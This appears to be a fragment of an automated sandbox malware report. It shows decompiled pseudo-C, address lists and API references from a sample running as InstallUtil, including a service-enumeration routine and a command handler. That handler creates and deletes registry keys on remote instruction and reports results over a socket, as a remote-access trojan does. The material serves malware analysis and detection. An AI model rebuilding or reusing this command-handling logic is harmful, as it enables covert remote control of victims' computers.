					_t200 =  *(_t202 + 0x2c);
					goto L11;
				}
				E0040413E(_t133, _t194, _t185, 0, 0x4610ec);
				goto L13;
			}

0x00416fc6
0x00416fd2
0x00416fd4
0x00416fd8
0x00416fe2
0x00416fe6
0x00416ff9
0x00416ffd
0x00417006
0x0041700f
0x00417018
0x00417031
0x00417033
0x0041729f
0x004172a0
0x004172ad
0x004172b6
0x004172bb
0x004172c7
0x004172c7
0x0041703f
0x00417044
0x00000000
0x00000000
0x0041704a
0x0041704e
0x00417055
0x00417060
0x00417071
0x00417077
0x00417079
0x0041707d
0x00417081
0x00417298
0x00417299
0x00000000
0x0041729e
0x00417087
0x00417089
0x0041708d
0x004170ae
0x004170b7
0x004170c0
0x004170e5
0x004170ee
0x004170f7
0x00417108
0x0041711a
0x0041712b
0x00417134
0x0041713d
0x00417146
0x0041714b
0x00417155
0x0041715b
0x0041715f
0x00417168
0x0041716e
0x00417170
0x00417176
0x0041717c
0x0041717f
0x00417185
0x00417189
0x00417190
0x0041719d
0x004171c9
0x004171d2
0x004171db
0x00417201
0x0041720a
0x00417213
0x00417235
0x00417249
0x00417252
0x0041725b
0x00417264
0x0041726a
0x0041726f
0x00417273
0x0041717f
0x00417278
0x0041727e
0x0041727f
0x00417282
0x00417286
0x00417286
0x00417290
0x00417294
0x00000000
0x00417294
0x00416fef
0x00000000

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,0046EB98), ref: 00416FDC
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041702B
GetLastError.KERNEL32 ref: 00417039
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 00417071

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 8daae44d17b1695c0b0492279e758a85ce211f53b716cad71d96ed8095f55e8f
Instruction ID: bcdc87649b27bac0c2f48e017d66e6b1fe96cd9cd216ae4fb69fdb74765f6596
Opcode Fuzzy Hash: 8daae44d17b1695c0b0492279e758a85ce211f53b716cad71d96ed8095f55e8f
Instruction Fuzzy Hash: 918181711083449BC304EB61DC859AFB7ECFF94709F50092EF581561A2EF78EA46CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00411466 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 485
registrylibraryloaderCOMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00411466(void* __edx, void* __eflags, char _a8) {
				char _v36;
				char _v48;
				char _v52;
				void* _v60;
				char _v68;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				struct _SECURITY_ATTRIBUTES _v112;
				void* _v120;
				char _v128;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t75;
				void* _t86;
				void* _t97;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t111;
				void* _t118;
				void* _t119;
				void* _t121;
				void* _t125;
				void* _t130;
				void* _t136;
				void* _t140;
				void* _t145;
				void* _t151;
				void* _t153;
				void* _t154;
				void* _t156;
				void* _t157;
				void* _t163;
				void* _t165;
				void* _t166;
				void* _t168;
				void* _t174;
				void* _t176;
				void* _t177;
				void* _t179;
				void* _t184;
				void* _t185;
				long _t188;
				void* _t195;
				void* _t207;
				void* _t209;
				void* _t220;
				void* _t236;
				void* _t250;
				signed int _t327;
				void* _t330;
				void* _t332;
				void* _t337;
				void* _t339;
				void* _t341;
				signed int _t342;
				void* _t344;
				void* _t351;
				signed int _t352;
				void* _t355;
				void* _t356;
				void* _t357;
				void* _t360;
				void* _t365;
				void* _t366;
				void* _t368;
				void* _t369;
				void* _t371;
				void* _t373;
				void* _t374;
				void* _t376;
				void* _t378;
				void* _t380;
				void* _t385;

				_t385 = __eflags;
				_t325 = __edx;
				_push(_t207);
				_t75 = E00401F6B( &_a8);
				_push(0xffffffff);
				_t330 = 4;
				_push(_t330);
				_push( &_v52);
				E00404162( &_a8);
				_t355 = (_t352 & 0xfffffff8) - 0x4c;
				E004020B6(_t207, _t355, __edx, _t385, 0x46e260);
				_t356 = _t355 - 0x18;
				E004020B6(_t207, _t356, __edx, _t385,  &_v68);
				E0041851D( &_v108, __edx);
				_t357 = _t356 + 0x30;
				_t337 =  *_t75 - 0x35;
				if(_t337 == 0) {
					E00401F46(_t207,  &_v76);
					__eflags = E004021BA( &_v88) - 1;
					if(__eflags > 0) {
						L00409F8A(_t207,  &_v80, _t325, E00401F6B(E00401E25( &_v88, _t325, _t351, __eflags, 1)));
					}
					E004020B6(_t207, _t357 - 0x18, _t325, __eflags, E00401E25( &_v88, _t325, _t351, __eflags, 0));
					_t86 = E00401EC4( &_v84);
					_t325 = 1;
					_t220 = _t86;
					L33:
					E00411281(_t220, _t325, _t392);
					L34:
					E00401EC9();
					L35:
					E00401E4D( &_v88, _t325);
					E00401F98();
					E00401F98();
					return 0;
				}
				_t339 = _t337 - 1;
				if(_t339 == 0) {
					_t97 = E00401F6B(E00401E25( &_v88, __edx, _t351, __eflags, 2));
					_t99 = E00401F6B(E00401E25( &_v92, __edx, _t351, __eflags, 1));
					_t332 = 0;
					_t100 = E00401E25( &_v96, __edx, _t351, __eflags, 0);
					_t360 = _t357 - 0x18;
					E004020B6(_t207, _t360, _t325, __eflags, _t100);
					_t102 = E004111F0(_t207, __eflags, _t97);
					_t325 = _t99;
					_t103 = E00410F97(_t102, _t99);
					_t362 = _t360 + 0x18 - 0x18;
					_t236 = _t360 + 0x18 - 0x18;
					__eflags = _t103;
					if(__eflags == 0) {
						_push("2");
						L29:
						E00402053(_t207, _t236, _t325, _t351);
						E00404A78(0x46e7b8, _t325, __eflags);
						goto L35;
					}
					_push("1");
					L18:
					E00402053(_t207, _t236, _t325, _t351);
					E00404A78(0x46e7b8, _t325, __eflags);
					E004020B6(_t207, _t362 - 0x18, _t325, __eflags, E00401E25( &_v120, _t325, _t351, __eflags, _t332));
					_t111 = E00401F6B(E00401E25( &_v128, _t325, _t351, __eflags, 1));
					_t325 = 0;
					E00411281(_t111, 0, __eflags);
					goto L35;
				}
				_t341 = _t339 - 1;
				if(_t341 == 0) {
					E0040413E(_t207,  &_v80, __edx, _t351, E00401F6B(E00401E25( &_v88, __edx, _t351, __eflags, 1)));
					 *0x46dd5c = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
					_t118 = E00401EC4( &_v84);
					_t119 = E00401E25( &_v96, _t325, _t351, __eflags, 0);
					_t365 = _t357 - 0x18;
					E004020B6(_t207, _t365, _t325, __eflags, _t119);
					_t121 = E004111F0(_t207, __eflags, _t118);
					_t366 = _t365 + 0x18;
					__eflags =  *0x46dd5c(_t121);
					if(__eflags != 0) {
						_t250 = _t366 - 0x18;
						_push("9");
					} else {
						_t125 = E0040243C();
						_t342 = 2;
						_t207 = E00411A9D( &_v84, "\\", _t125 - _t342);
						__eflags = _t207 - 0xffffffff;
						if(__eflags != 0) {
							_t51 = _t207 + 1; // 0x1
							_t130 = E004310E6( ~0x00BADBAD | _t51 * _t342, _t51 * _t342 >> 0x20, _t342, __eflags);
							E00439346(_t130, E00401EC4(E004076F1( &_v84,  &_v36, 0, _t207)));
							E00401EC9();
							_t136 = E00401E25( &_v108, _t51 * _t342 >> 0x20, _t351, __eflags, 0);
							_t368 = _t366 - 0x18;
							E004020B6(_t207, _t368, _t51 * _t342 >> 0x20, __eflags, _t136);
							_t325 = 0;
							__eflags = 0;
							E00411281(_t130, 0, 0,  ~0x00BADBAD | _t51 * _t342);
							E004310EF(_t130);
							_t369 = _t368 + 0x1c;
						} else {
							_t140 = E00401E25( &_v96, _t325, _t351, __eflags, 0);
							_t371 = _t366 - 0x18;
							E004020B6(_t207, _t371, _t325, __eflags, _t140);
							_t325 = 0;
							E00411281(0, 0, __eflags);
							_t369 = _t371 + 0x18;
						}
						_t250 = _t369 - 0x18;
						_push("8");
					}
					L10:
					E00402053(_t207, _t250, _t325, _t351);
					E00404A78(0x46e7b8, _t325, __eflags);
					goto L34;
				}
				_t344 = _t341 - 1;
				if(_t344 == 0) {
					_t145 = E004383EC(_t143, E00401F6B(E00401E25( &_v88, __edx, _t351, __eflags, 3)));
					__eflags = _t145 - _t330;
					if(__eflags == 0) {
						E00433220( &_v108, E00401F6B(E00401E25( &_v92, __edx, _t351, __eflags, _t330)), _t330);
						_push(_v108);
						_t151 = E00401F6B(E00401E25( &_v92, _t325, _t351, __eflags, 2));
						_t153 = E00401F6B(E00401E25( &_v96, _t325, _t351, __eflags, 1));
						_t332 = 0;
						__eflags = 0;
						_t154 = E00401E25( &_v100, _t325, _t351, 0, 0);
						_t373 = _t357 + 0xc - 0x18;
						E004020B6(_t207, _t373, _t325, __eflags, _t154);
						_t156 = E004111F0(_t207, __eflags, _t151);
						_t374 = _t373 + 0x18;
						_t325 = _t153;
						_t157 = E00410E33(_t156, _t153);
					} else {
						__eflags = _t145 - 0xb;
						if(__eflags == 0) {
							E00433220( &_v104, E00401F6B(E00401E25( &_v92, __edx, _t351, __eflags, _t330)), 8);
							_t163 = E00401F6B(E00401E25( &_v92, _t325, _t351, __eflags, 2));
							_t165 = E00401F6B(E00401E25( &_v96, _t325, _t351, __eflags, 1));
							_t332 = 0;
							_t166 = E00401E25( &_v100, _t325, _t351, __eflags, 0);
							_t376 = _t357 + 0xc - 0x18;
							E004020B6(_t207, _t376, _t325, __eflags, _t166);
							_t168 = E004111F0(_t207, __eflags, _t163);
							_t325 = _t165;
							_t157 = E00410E77(_t168, _t165, _v104, _v100);
							_t374 = _t376 + 0x24;
						} else {
							_push(_t145);
							E00401E25( &_v92, __edx, _t351, __eflags, _t330);
							_push(E0040243C());
							_push(E00401F6B(E00401E25( &_v92, __edx, _t351, __eflags, _t330)));
							_t174 = E00401F6B(E00401E25( &_v96, _t325, _t351, __eflags, 2));
							_t176 = E00401F6B(E00401E25( &_v100, _t325, _t351, __eflags, 1));
							_t332 = 0;
							_t177 = E00401E25( &_v104, _t325, _t351, __eflags, 0);
							_t378 = _t357 - 0x18;
							E004020B6(_t207, _t378, _t325, __eflags, _t177);
							_t179 = E004111F0(_t207, __eflags, _t174);
							_t325 = _t176;
							_t157 = E00410D43(_t179, _t176);
							_t374 = _t378 + 0x28;
						}
					}
					_t362 = _t374 - 0x18;
					_t236 = _t374 - 0x18;
					__eflags = _t157;
					if(__eflags == 0) {
						_push("5");
						goto L29;
					} else {
						_push("4");
						goto L18;
					}
				}
				_t390 = _t344 != 1;
				if(_t344 != 1) {
					goto L35;
				}
				E0040413E(_t207,  &_v80, __edx, _t351, E00401F6B(E00401E25( &_v88, __edx, _t351, _t390, 1)));
				_t184 = E00401EC4( &_v84);
				_t185 = E00401E25( &_v96, __edx, _t351, _t390, 0);
				_t380 = _t357 - 0x18;
				E004020B6(_t207, _t380, _t325, _t390, _t185);
				_t188 = RegCreateKeyExW(E004111F0(_t207, _t390, _t184), 0, 0, 0, 0x20006, 0,  &_v112, 0, ??);
				_t349 = _t188;
				RegCloseKey(_v120);
				_t382 = _t380 + 0x18 - 0x18;
				_t250 = _t380 + 0x18 - 0x18;
				_t391 = _t188;
				if(_t188 != 0) {
					_push("7");
					goto L10;
				}
				E00402053(_t207, _t250, _t325, _t351, "6");
				_push(0x72);
				E00404A78(0x46e7b8, _t325, _t391);
				_t209 = E0040770B( &_v108, 0x46e7b8, 0x46e7b8);
				_t392 = _t209 - 0xffffffff;
				if(_t209 != 0xffffffff) {
					_t14 = _t209 + 1; // 0x1
					_t327 = 2;
					_t195 = E004310E6( ~(__eflags > 0) | _t14 * _t327, _t14 * _t327 >> 0x20, _t349, __eflags);
					E00439346(_t195, E00401EC4(E004076F1( &_v96,  &_v48, 0, _t209)));
					E00401EC9();
					E004020B6(_t209, _t382 - 0x18, _t14 * _t327 >> 0x20, __eflags, E00401E25( &_v120, _t14 * _t327 >> 0x20, _t351, __eflags, 0));
					_t325 = 0;
					E00411281(_t195, 0, __eflags,  ~(__eflags > 0) | _t14 * _t327);
					E004310EF(_t195);
					goto L34;
				} else {
					E004020B6(_t209, _t382 - 0x18, _t325, _t392, E00401E25( &_v108, _t325, _t351, _t392, 0));
					_t325 = 0;
					_t220 = 0;
					goto L33;
				}
			}

0x00411466
0x00411466
0x00411472
0x00411475
0x0041147a
0x0041147e
0x00411484
0x00411489
0x0041148a
0x0041148f
0x00411499
0x0041149e
0x004114a8
0x004114b1
0x004114b6
0x004114b9
0x004114bc
0x004119d2
0x004119e0
0x004119e3
0x004119fc
0x004119fc
0x00411a12
0x00411a1b
0x00411a20
0x00411a22
0x00411a24
0x00411a24
0x00411a2c
0x00411a30
0x00411a35
0x00411a39
0x00411a42
0x00411a4a
0x00411a57
0x00411a57
0x004114c2
0x004114c5
0x00411960
0x00411973
0x00411978
0x00411981
0x00411986
0x0041198c
0x00411991
0x00411999
0x0041199d
0x004119a3
0x004119a6
0x004119a8
0x004119aa
0x004119b6
0x004119bb
0x004119bb
0x004119c7
0x00000000
0x004119c7
0x004119ac
0x004117c4
0x004117c4
0x004117d0
0x004117e5
0x004117f7
0x004117fc
0x00411800
0x00000000
0x00411805
0x004114cb
0x004114ce
0x0041182e
0x0041184e
0x00411853
0x00411860
0x00411865
0x0041186b
0x00411870
0x00411875
0x0041187f
0x00411881
0x00411947
0x00411949
0x00411887
0x0041188b
0x00411892
0x004118a4
0x004118a6
0x004118a9
0x004118d0
0x004118dd
0x004118fe
0x00411909
0x00411913
0x00411918
0x0041191e
0x00411923
0x00411923
0x00411927
0x0041192d
0x00411932
0x004118ab
0x004118b0
0x004118b5
0x004118bb
0x004118c0
0x004118c4
0x004118c9
0x004118c9
0x00411938
0x0041193a
0x0041193a
0x00411614
0x00411614
0x00411620
0x00000000
0x00411620
0x004114d4
0x004114d7
0x0041163d
0x00411647
0x00411649
0x00411759
0x00411765
0x00411772
0x00411785
0x0041178a
0x0041178a
0x00411793
0x00411798
0x0041179e
0x004117a3
0x004117a8
0x004117ab
0x004117af
0x0041164f
0x0041164f
0x00411652
0x004116e1
0x004116fe
0x00411711
0x00411716
0x0041171f
0x00411724
0x0041172a
0x0041172f
0x00411737
0x0041173b
0x00411740
0x00411654
0x00411654
0x00411656
0x00411662
0x00411674
0x00411682
0x00411695
0x0041169a
0x004116a3
0x004116a8
0x004116ae
0x004116b3
0x004116bb
0x004116bf
0x004116c4
0x004116c4
0x00411652
0x004117b6
0x004117b9
0x004117bb
0x004117bd
0x0041180d
0x00000000
0x004117bf
0x004117bf
0x00000000
0x004117bf
0x004117bd
0x004114dd
0x004114e0
0x00000000
0x00000000
0x004114fd
0x00411517
0x00411522
0x00411527
0x0041152d
0x0041153b
0x00411545
0x00411547
0x0041154d
0x00411550
0x00411552
0x00411554
0x0041160f
0x00000000
0x0041160f
0x0041155f
0x00411564
0x0041156b
0x0041157b
0x0041157d
0x00411580
0x004115a2
0x004115a7
0x004115b2
0x004115d3
0x004115de
0x004115f3
0x004115f8
0x004115fc
0x00411602
0x00000000
0x00411582
0x00411592
0x00411597
0x00411599
0x00000000
0x00411599

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041153B
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00411547

Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041183D
GetProcAddress.KERNEL32(00000000), ref: 00411844

Strings

Shlwapi.dll, xrefs: 00411838
SHDeleteKeyW, xrefs: 00411833

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: 5d878569cfdc9c39262a3c816bedd7a7c85ca54580c4ef62714b668f3556edb2
Instruction ID: 6b87092ff92e7c26662d3c804290ab8ac8a3e1aac783564dfde44c8b7133d751
Opcode Fuzzy Hash: 5d878569cfdc9c39262a3c816bedd7a7c85ca54580c4ef62714b668f3556edb2
Instruction Fuzzy Hash: 3CE1D872A0430067C614B776DD679EF76A95F95308F00052FF902B71F2EE7D8A44829B

Uniqueness

Uniqueness Score: -1.00%

Function 004451D0 Relevance: 10.9, APIs: 7, Instructions: 370
timeCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E004451D0(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				signed int _t167;
				intOrPtr* _t168;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t178 = __esi;
				_t171 = __edi;
				_t65 = E00444E0F();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E00444E6D( &_v8) != 0 || E00444E15( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00438659();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E00444E0F();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E00444E6D( &_v52);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00438659();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x46c00c; // 0xe1ce05e9
						_v100 = _t74 ^ _t192;
						 *0x46c334 =  *0x46c334 | 0xffffffff;
						 *0x46c328 =  *0x46c328 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t139 = "TZ";
						_t172 = 0;
						 *0x46d748 = 0;
						_t78 = E00438A25(__eflags,  &_v360,  &_v356, 0x100, "TZ");
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E004421F7(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E00438A25(__eflags,  &_v280, _t184, _v276, _t139);
									__eflags = _t85;
									if(_t85 == 0) {
										E004427C2(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E004427C2();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L80:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t172);
								E004451D0(_t139, _t172, _t183, __eflags);
							}
						}
						E004427C2(_t183);
						__eflags = _v16 ^ _t192;
						return E004318FB(_v16 ^ _t192);
					} else {
						_t89 = E00444E15( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E00444E41( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E004427C2( *0x46d740);
								 *0x46d740 = 0;
								 *_t194 = 0x46d750;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x46d750 * 0x3c;
									_t167 =  *0x46d7a4; // 0x0
									_push(_t171);
									 *0x46d748 = 1;
									_v12 = _t150;
									__eflags =  *0x46d796; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t167 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x46d7ea; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x46d7f8; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t167) * 0x3c;
										}
									}
									_t176 = E00441DC6(0, _t167);
									_t99 = WideCharToMultiByte(_t176, 0, 0x46d754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x46d7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E00444E09()) = _v12;
								 *((intOrPtr*)(E00444DFD())) = _v16;
								_t96 = E00444E03();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t168 =  *0x46d740; // 0x0
					_t178 = _a4;
					if(_t168 == 0) {
						L12:
						E004427C2(_t168);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x4455c1
						_t169 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t169 + 1; // 0x4455c2
						 *0x46d740 = E004421F7(_t154 - _t169, _t13);
						_t116 = E004427C2(0);
						_t170 =  *0x46d740; // 0x0
						if(_t170 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x4455c1
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x4455c2
							_t119 = E0043DAD7(_t170, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E0043AD93(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E004383EC(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E004383EC(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E004383EC(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E00444E09()) = _v8;
										_t128 = E00444DFD();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E0043AD93(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t168;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L82:
			}

0x004451d0
0x004451d0
0x004451da
0x004451df
0x004451e3
0x004451e5
0x004451ed
0x004451f8
0x00445398
0x0044539a
0x0044539b
0x0044539c
0x0044539d
0x0044539e
0x0044539f
0x004453a4
0x004453a8
0x004453aa
0x004453ad
0x004453b4
0x004453bb
0x004453bf
0x004453c2
0x004453c5
0x004453ca
0x004453cb
0x004453cd
0x004454f5
0x004454f5
0x004454f6
0x004454f7
0x004454f8
0x004454f9
0x004454fa
0x004454ff
0x00445502
0x00445503
0x0044550b
0x00445512
0x00445515
0x00445522
0x00445529
0x0044552a
0x0044552b
0x0044552c
0x00445531
0x00445540
0x00445547
0x0044554f
0x00445551
0x0044555b
0x0044555e
0x0044556b
0x0044556e
0x00445570
0x00445589
0x00445591
0x00445593
0x00445599
0x0044559e
0x00445595
0x00445595
0x00000000
0x00445595
0x00445572
0x00445572
0x00445573
0x00445573
0x00445573
0x004455a0
0x00445553
0x00445553
0x00445553
0x004455ad
0x004455af
0x004455b1
0x004455b3
0x004455c3
0x004455c3
0x004455b5
0x004455b5
0x004455b8
0x00000000
0x004455ba
0x004455ba
0x004455bb
0x004455c0
0x004455b8
0x004455c9
0x004455d4
0x004455df
0x004453d3
0x004453d7
0x004453dc
0x004453dd
0x004453df
0x00000000
0x004453e5
0x004453e9
0x004453ee
0x004453ef
0x004453f1
0x00000000
0x004453f7
0x004453fd
0x00445402
0x00445408
0x0044540f
0x00445415
0x00445418
0x0044541e
0x00445425
0x0044542b
0x0044542f
0x00445435
0x00445438
0x0044543f
0x00445444
0x00445444
0x00445446
0x00445446
0x00445449
0x00445450
0x00445468
0x00445468
0x0044546b
0x00445452
0x00445452
0x00445457
0x00445459
0x00000000
0x0044545b
0x0044545d
0x00445463
0x00445463
0x00445459
0x00445473
0x00445487
0x0044548d
0x0044548f
0x0044549d
0x0044549f
0x00445491
0x00445491
0x00445494
0x00000000
0x00445496
0x00445498
0x00445498
0x00445494
0x004454b4
0x004454bb
0x004454bd
0x004454cc
0x004454cf
0x004454bf
0x004454bf
0x004454c2
0x00000000
0x004454c4
0x004454c7
0x004454c7
0x004454c2
0x004454bd
0x004454d9
0x004454e3
0x004454e8
0x004454ed
0x004454f4
0x004454f4
0x004453f1
0x004453df
0x00445210
0x00445210
0x00445216
0x0044521b
0x00445251
0x00445252
0x00445258
0x0044525a
0x0044525a
0x0044525d
0x0044525d
0x0044525f
0x00445260
0x00445266
0x00445271
0x00445276
0x0044527b
0x00445285
0x00000000
0x0044528b
0x0044528b
0x0044528d
0x0044528e
0x0044528e
0x00445291
0x00445291
0x00445293
0x00445294
0x0044529b
0x004452a0
0x004452a5
0x004452aa
0x004452b2
0x004452b3
0x004452b9
0x004452be
0x004452c3
0x004452c9
0x004452ce
0x004452cf
0x004452d2
0x00000000
0x00000000
0x00000000
0x004452d2
0x004452d7
0x004452d8
0x004452dd
0x004452df
0x004452df
0x004452e7
0x004452ed
0x004452f0
0x004452f0
0x004452f4
0x00000000
0x00000000
0x004452fe
0x004452fe
0x00445301
0x00445304
0x00445306
0x00445314
0x00445316
0x00445320
0x00445320
0x00445322
0x00445324
0x00000000
0x00000000
0x0044531b
0x0044531d
0x0044531f
0x0044531f
0x00000000
0x0044531f
0x00000000
0x0044531d
0x00445326
0x00445329
0x0044532b
0x00445336
0x00445338
0x00445342
0x00445342
0x00445344
0x00445346
0x00000000
0x00000000
0x0044533d
0x0044533f
0x00445341
0x00445341
0x00000000
0x00445341
